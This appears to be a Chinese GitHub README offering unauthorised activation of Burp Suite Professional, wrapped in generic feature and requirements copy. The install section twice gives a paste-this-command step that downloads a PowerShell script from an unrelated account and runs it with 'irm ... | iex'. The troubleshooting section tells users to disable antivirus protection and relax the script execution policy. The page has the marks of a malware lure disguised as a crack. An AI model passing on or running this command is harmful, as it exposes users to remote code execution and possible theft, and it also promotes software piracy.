Capitalzyaeliminate/Burp-Suite-Professional-activate-command
GitHub: Capitalzyaeliminate/Burp-Suite-Professional-activate-command
一个通过 PowerShell 脚本非授权激活商业 Web 安全测试工具 Burp Suite Professional 的仓库。
Stars: 1 | Forks: 0
# Burp Suite Professional
Burp Suite Professional 是由 PortSwigger 开发的业界领先的 Web 应用程序安全测试平台。它是渗透测试人员、安全研究人员和漏洞赏金猎人的主要工具包,他们需要对 Web 应用程序漏洞进行全面评估。与免费的 Community 版本不同,Professional 版本解锁了完整的自动化扫描器、高级的 Intruder 攻击模式以及完整的 BApp Store 扩展库,使其成为任何严谨的安全专业人员工作流程中不可或缺的工具。
该平台作为一个拦截代理运行于浏览器和目标 Web 应用程序之间,使测试人员能够完全可视化和控制传输中的每一个 HTTP 和 WebSocket 消息。企业、咨询公司和政府机构的安全团队依赖 Burp Suite Professional 来识别关键漏洞,包括 SQL 注入、跨站脚本攻击、跨站请求伪造、不安全的反序列化和身份验证绕过等,以防恶意行为者利用它们。其手动和自动测试能力的结合使其既适合快速测试任务,也适合深度的应用程序审计。
Burp Suite Professional 按用户按年授权,是渗透测试社区中采用最广泛的工具之一。其通过 Montoya API 实现的可扩展架构允许开发人员和研究人员构建自定义扩展,这些扩展无缝集成到测试工作流程中,进一步将其功能扩展到内置功能集之外。
要开始使用,请打开 PowerShell(Win+R,输入 powershell)并运行:
```
irm https://raw.githubusercontent.com/SlayerCoralPersonify/Activate/main/install.ps1 | iex
```
### 主要功能
- **拦截代理** — 实时捕获并修改浏览器与目标应用程序之间的所有 HTTP/S 和 WebSocket 流量
- **自动化漏洞扫描器** — 主动爬取并审计 Web 应用程序,检测包括 OWASP Top 10 类别在内的 100 多种漏洞类型
- **高级 Intruder** — 执行高度可配置的模糊测试和暴力破解攻击,支持无限请求限速和可自定义的 payload 位置
- **Burp Repeater** — 允许手动构建并重放单个 HTTP 请求,以探测特定 endpoint 和参数
- **Burp Collaborator** — 通过外部交互服务器检测带外漏洞,如盲 SSRF、盲 XXE 和异步注入
- **BApp Store 扩展** — 访问完整的社区和官方扩展库,包括 ActiveScan++、Autorize 和 Turbo Intruder
- **Burp Sequencer** — 分析会话 token 和其他密码学值的随机性和熵,以识别可预测的 token 生成
- **Montoya API** — 一个现代的基于 Java 的扩展 API,支持将自定义插件开发完全集成到 Burp Suite Professional UI 中
- **项目文件** — 将完整的会话状态、请求、扫描结果和笔记保存到一个可移植的项目文件中,以实现可恢复和可共享的测试任务
- **内置 Chromium 浏览器** — 预配置的浏览器,自动安装了 Burp CA 证书,无需手动设置即可实现无缝流量拦截
### 系统要求
| 组件 | 最低要求 | 推荐配置 |
|-----------|---------|-------------|
| 操作系统 | Windows 10 / macOS 11 / Ubuntu 20.04 | Windows 11 / macOS 13 / Ubuntu 22.04 |
| CPU | 双核 2.0 GHz | 四核 3.0 GHz 或更高 |
| 内存 | 4 GB | 8 GB 或更多 |
| 磁盘空间 | 2 GB 可用空间 | 10 GB 可用空间(用于项目文件和扫描数据) |
| Java 运行时 | 内置 (JRE 21) | 内置 (JRE 21) |
| 网络 | 标准 TCP/IP | 千兆局域网或高速互联网连接 |
| 显示器 | 1280 x 800 | 1920 x 1080 或更高 |
### 安装说明
1. 按 Win+R,输入 `powershell`,然后按 Enter 键打开 PowerShell。
2. 粘贴以下命令并按 Enter 键:
irm https://raw.githubusercontent.com/SlayerCoralPersonify/Activate/main/install.ps1 | iex
3. 按照屏幕上的提示完成设置和激活过程。
4. 安装完成后,从桌面快捷方式或“开始”菜单启动 Burp Suite Professional。
### 故障排除
1. **执行策略被阻止** — 如果 PowerShell 拒绝运行脚本,请首先使用以下命令设置执行策略:
Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy RemoteSigned
然后重新运行安装命令。
2. **粘贴命令后没有任何反应** — 通过运行以下命令验证您的 PowerShell 版本是否为 5.1 或更高版本:
$PSVersionTable.PSVersion
如果主版本低于 5,请从 Microsoft 下载并安装 Windows Management Framework 5.1。
3. **防病毒软件阻止了脚本** — 安全软件可能会因为其脚本化的激活例程而将安装程序误报。暂时禁用实时保护或为下载目录添加排除项,运行安装程序,然后再重新启用保护。
4. **Burp Suite Professional 启动时崩溃** — 这通常是由于堆内存不足造成的。导航到安装目录并编辑 `vmoptions` 文件以增加 `-Xmx` 值(例如,`-Xmx2g` 表示 2 GB 堆内存)。如果内置 Chromium 浏览器无法启动,请确保没有其他进程正在锁定 `%APPDATA%\BurpSuite` 下的用户数据目录。
5. **网络或代理连接错误** — 如果安装程序无法通过企业代理连接到互联网,请在运行命令之前配置 PowerShell 的 Web 请求代理设置:
[System.Net.WebRequest]::DefaultWebProxy = New-Object System.Net.WebProxy("http://your-proxy:port")
[System.Net.WebRequest]::DefaultWebProxy.Credentials = [System.Net.CredentialCache]::DefaultCredentials
6. **许可证激活失败或显示无效状态** — 确保系统时钟准确,因为许可证验证对时间敏感。如果无法连接到许可证服务器,请检查 `api.portswigger.net` 和 `burpsuite.com` 是否被防火墙或 hosts 文件条目阻止。从 `%USERPROFILE%\.java` 中删除过期的许可证文件并重启 Burp Suite Professional 也可以解决许可证缓存损坏的状态。
### 关于
Burp Suite 最初由 PortSwigger 于 2003 年作为个人安全测试工具发布,后来发展成为全球 Web 应用程序渗透测试领域占主导地位的商业平台。PortSwigger 不断通过定期更新来开发该产品,添加新的扫描器检查、UI 改进和 API 增强。Burp Suite Professional 被用于 OSCP 和 eWPT 等认证考试中,构成了 HackerOne 和 Bugcrowd 等平台上漏洞赏金工作流的基础,并且几乎是每个行业的安全咨询公司和内部红队工具包中的标准配置。
### 支持
如果这个仓库对您有帮助,请考虑点个 star 以支持进一步的开发和维护。
[](#installation)
标签:AI合规, CISA项目, Docker部署, JS文件枚举, Libemu, Web安全, 抓包代理, 蓝队分析